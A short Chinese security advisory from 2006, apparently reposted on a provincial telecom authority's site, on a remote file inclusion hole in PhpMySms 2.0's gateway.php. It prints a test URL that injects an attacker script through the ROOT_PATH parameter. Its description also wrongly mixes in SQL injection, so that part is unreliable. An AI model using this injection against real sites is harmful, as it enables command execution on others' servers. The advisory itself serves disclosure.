最新通知

当前位置: 首页 - 行业统计 - 最新通知

PHPMySMS Gateway.PHP远程文件包含漏洞

发布于:2006-06-27 15:39:05 点击量:2188   
发布时间:2006-6-26 16:48:28
文章作者:ADLab
文章来源:启明星辰
BUGTRAQ ID:18633
CNCAN ID:CNCAN-2006062609

漏洞消息时间:2006-06-24

漏洞起因
输入验证错误

影响系统
PhpMySms PhpMySms 2.0

危害
远程攻击者可以利用漏洞以WEB进程权限执行任意命令。

攻击所需条件
攻击者必须访问phpmysms。

漏洞信息
phpmysms是使用php对各个ISP的WEB-SMS端实行登陆,自动发送短信息的应用程序。
phpmysms不充分过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。
问题是'gateway.php'脚本对用户提交的'root_path'参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息。

测试方法
http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

厂商解决方案
目前没有详细解决方案提供,请关注以下链接:
Http://www.phpmysms.com

漏洞提供者
Persian-Defacer 

漏洞消息链接
http://www.securityfocus.com/bid/18633

漏洞消息标题
PHPMySMS Gateway.PHP Remote File Include Vulnerability
湖北省通信管理局 鄂ICP备05000001号 武汉市东湖新技术开发区珞喻路789号 版权所有(C)2003-2008
网站备案咨询电话:027-87796833 027-87796822
增值电信业务许可证申请咨询电话:027-87796369
办公室电话:027-87796999 传真电话:027-87796000 网站建设: 双军技术